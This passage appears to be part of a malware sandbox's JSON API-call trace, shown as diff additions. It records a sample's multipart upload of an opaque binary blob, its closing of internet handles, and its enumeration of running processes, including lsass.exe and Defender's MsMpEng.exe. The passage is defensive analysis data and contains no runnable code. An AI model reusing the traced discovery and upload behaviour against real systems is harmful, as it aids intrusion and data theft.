"\r\n-----------------------------435448455781181\r\nContent-Disposition: form-data; name=\"xsKfcP\"; filename=\"ZbOieCx\"\r\nContent-Type: application/octet-stream\r\n\r\np\\xfayByX]\\xb0\\x8b'\\x8f\\x0b}!q\\xdb\\xc2\\xb4\\xa4\\xefe\\x14m\\xb8,\\xe3\\x01\\xb5\\x1e48\\x97\\x82\\x90\\x8f\\xc8\\x851F[y`\\xe0=Q\\x9cE\\xdf\\xf0\\xd29\\xd5\\xc5\\x15\\x10?\\x98\\x8dE\\xe7\\x14=O\\xa4\\x1d\\x84Z\\x9d\\xd3\\xb8\\x0c\\x94+d^\\x90\\x7f\\x1a\\xdd\\xea\\xd1\\xe9\\xcb\\x93\\xfa-\\x9c\\x868\\xea3\\xf7k\\xf6\\xb2\\xb5\\xc0\\x08}" + } + ], + "repeated": 0, + "id": 1727 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 5, + "id": 1728 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc000c" + } + ], + "repeated": 0, + "id": 1729 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "9440", + "caller": "0x03ce227a", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + } + ], + "repeated": 0, + "id": 1730 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "9440", + "caller": "0x03ce23c3", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + } + ], + "repeated": 0, + "id": 1731 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1732 + }, + { + "timestamp": "2025-03-07 22:34:37,391", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "312" + } + ], + "repeated": 0, + "id": 1733 + }, + { + "timestamp": "2025-03-07 22:34:37,704", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1734 + }, + { + "timestamp": "2025-03-07 22:34:37,704", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "305" + } + ], + "repeated": 0, + "id": 1735 + }, + { + "timestamp": "2025-03-07 22:34:38,016", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1736 + }, + { + "timestamp": "2025-03-07 22:34:38,016", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "297" + } + ], + "repeated": 0, + "id": 1737 + }, + { + "timestamp": "2025-03-07 22:34:38,329", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1738 + }, + { + "timestamp": "2025-03-07 22:34:38,329", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "290" + } + ], + "repeated": 0, + "id": 1739 + }, + { + "timestamp": "2025-03-07 22:34:38,625", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1740 + }, + { + "timestamp": "2025-03-07 22:34:38,625", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "266" + } + ], + "repeated": 0, + "id": 1741 + }, + { + "timestamp": "2025-03-07 22:34:38,907", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1742 + }, + { + "timestamp": "2025-03-07 22:34:38,907", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "228" + } + ], + "repeated": 0, + "id": 1743 + }, + { + "timestamp": "2025-03-07 22:34:39,141", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1744 + }, + { + "timestamp": "2025-03-07 22:34:39,141", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "302" + } + ], + "repeated": 0, + "id": 1745 + }, + { + "timestamp": "2025-03-07 22:34:39,454", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1746 + }, + { + "timestamp": "2025-03-07 22:34:39,454", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "295" + } + ], + "repeated": 0, + "id": 1747 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce36cc", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "CreateToolhelp32Snapshot", + "status": true, + "return": "0x000004dc", + "arguments": [ + { + "name": "Flags", + "value": "0x00000002", + "pretty_value": "TH32CS_SNAPPROCESS" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1748 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32FirstW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "[System Process]" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1749 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "System" + }, + { + "name": "ProcessId", + "value": "4" + } + ], + "repeated": 0, + "id": 1750 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Registry" + }, + { + "name": "ProcessId", + "value": "92" + } + ], + "repeated": 0, + "id": 1751 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smss.exe" + }, + { + "name": "ProcessId", + "value": "328" + } + ], + "repeated": 0, + "id": 1752 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "428" + } + ], + "repeated": 0, + "id": 1753 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "wininit.exe" + }, + { + "name": "ProcessId", + "value": "504" + } + ], + "repeated": 0, + "id": 1754 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "516" + } + ], + "repeated": 0, + "id": 1755 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "winlogon.exe" + }, + { + "name": "ProcessId", + "value": "600" + } + ], + "repeated": 0, + "id": 1756 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "services.exe" + }, + { + "name": "ProcessId", + "value": "640" + } + ], + "repeated": 0, + "id": 1757 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "lsass.exe" + }, + { + "name": "ProcessId", + "value": "660" + } + ], + "repeated": 0, + "id": 1758 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "752" + } + ], + "repeated": 0, + "id": 1759 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "760" + } + ], + "repeated": 0, + "id": 1760 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "768" + } + ], + "repeated": 0, + "id": 1761 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "880" + } + ], + "repeated": 0, + "id": 1762 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "932" + } + ], + "repeated": 0, + "id": 1763 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dwm.exe" + }, + { + "name": "ProcessId", + "value": "1004" + } + ], + "repeated": 0, + "id": 1764 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "520" + } + ], + "repeated": 0, + "id": 1765 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "696" + } + ], + "repeated": 0, + "id": 1766 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "844" + } + ], + "repeated": 0, + "id": 1767 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1100" + } + ], + "repeated": 0, + "id": 1768 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1120" + } + ], + "repeated": 0, + "id": 1769 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1140" + } + ], + "repeated": 0, + "id": 1770 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1152" + } + ], + "repeated": 0, + "id": 1771 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1172" + } + ], + "repeated": 0, + "id": 1772 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1224" + } + ], + "repeated": 0, + "id": 1773 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1328" + } + ], + "repeated": 0, + "id": 1774 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1392" + } + ], + "repeated": 0, + "id": 1775 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1400" + } + ], + "repeated": 0, + "id": 1776 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1492" + } + ], + "repeated": 0, + "id": 1777 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1604" + } + ], + "repeated": 0, + "id": 1778 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1612" + } + ], + "repeated": 0, + "id": 1779 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1636" + } + ], + "repeated": 0, + "id": 1780 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Memory Compression" + }, + { + "name": "ProcessId", + "value": "1700" + } + ], + "repeated": 0, + "id": 1781 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1712" + } + ], + "repeated": 0, + "id": 1782 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1736" + } + ], + "repeated": 0, + "id": 1783 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1776" + } + ], + "repeated": 0, + "id": 1784 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1784" + } + ], + "repeated": 0, + "id": 1785 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1864" + } + ], + "repeated": 0, + "id": 1786 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1940" + } + ], + "repeated": 0, + "id": 1787 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1988" + } + ], + "repeated": 0, + "id": 1788 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2020" + } + ], + "repeated": 0, + "id": 1789 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2040" + } + ], + "repeated": 0, + "id": 1790 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1044" + } + ], + "repeated": 0, + "id": 1791 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2084" + } + ], + "repeated": 0, + "id": 1792 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2132" + } + ], + "repeated": 0, + "id": 1793 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "spoolsv.exe" + }, + { + "name": "ProcessId", + "value": "2208" + } + ], + "repeated": 0, + "id": 1794 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2260" + } + ], + "repeated": 0, + "id": 1795 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2320" + } + ], + "repeated": 0, + "id": 1796 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2432" + } + ], + "repeated": 0, + "id": 1797 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2468" + } + ], + "repeated": 0, + "id": 1798 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2512" + } + ], + "repeated": 0, + "id": 1799 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2544" + } + ], + "repeated": 0, + "id": 1800 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2564" + } + ], + "repeated": 0, + "id": 1801 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2580" + } + ], + "repeated": 0, + "id": 1802 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2608" + } + ], + "repeated": 0, + "id": 1803 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2732" + } + ], + "repeated": 0, + "id": 1804 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2756" + } + ], + "repeated": 0, + "id": 1805 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2772" + } + ], + "repeated": 0, + "id": 1806 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MsMpEng.exe" + }, + { + "name": "ProcessId", + "value": "2780" + } + ], + "repeated": 0, + "id": 1807 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2892" + } + ], + "repeated": 